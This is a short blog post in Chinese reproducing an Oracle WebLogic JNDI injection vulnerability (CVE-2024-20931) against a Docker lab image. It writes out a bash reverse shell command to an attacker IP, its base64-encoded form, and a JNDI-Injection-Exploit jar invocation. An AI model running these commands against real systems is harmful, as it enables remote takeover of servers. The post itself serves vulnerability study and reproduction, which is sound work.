Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)復現

安一_AA發表於2024-03-22

先從映象站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)
然後在docker中啟動這個映象
即可在網頁中訪問,搭建網站成功
使用利用工具來進行驗證是否存在漏洞
獲取DNS檢視是否有回顯
有回顯漏洞存在
創造反彈shell,先檢視攻擊機的ip
進行反彈shell編碼
使用nc開啟監聽埠
接下來,執行JNDI注入工具:
再在工具中輸入LDAP地址
檢視nc是否回去shell
獲取成功復現成功

先從映象站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)

docker pull ismaleiva90/weblogic12

fig:

然後在docker中啟動這個映象

docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

fig:

即可在網頁中訪問,搭建網站成功

fig:

使用利用工具來進行驗證是否存在漏洞
獲取DNS檢視是否有回顯

fig:

fig:

fig:

有回顯漏洞存在
創造反彈shell,先檢視攻擊機的ip

fig:

bash -i >& /dev/tcp/192.168.162.1/5557 0>&1

進行反彈shell編碼

fig:

bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjIuMS81NTU3IDA+JjE=}|{base64,-d}|{bash,-i}

使用nc開啟監聽埠

fig:

接下來,執行JNDI注入工具:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "編碼後的反彈Shell命令" -A "啟動惡意服務的伺服器IP"

fig:

再在工具中輸入LDAP地址

fig:

檢視nc是否回去shell

fig:

獲取成功復現成功

相關文章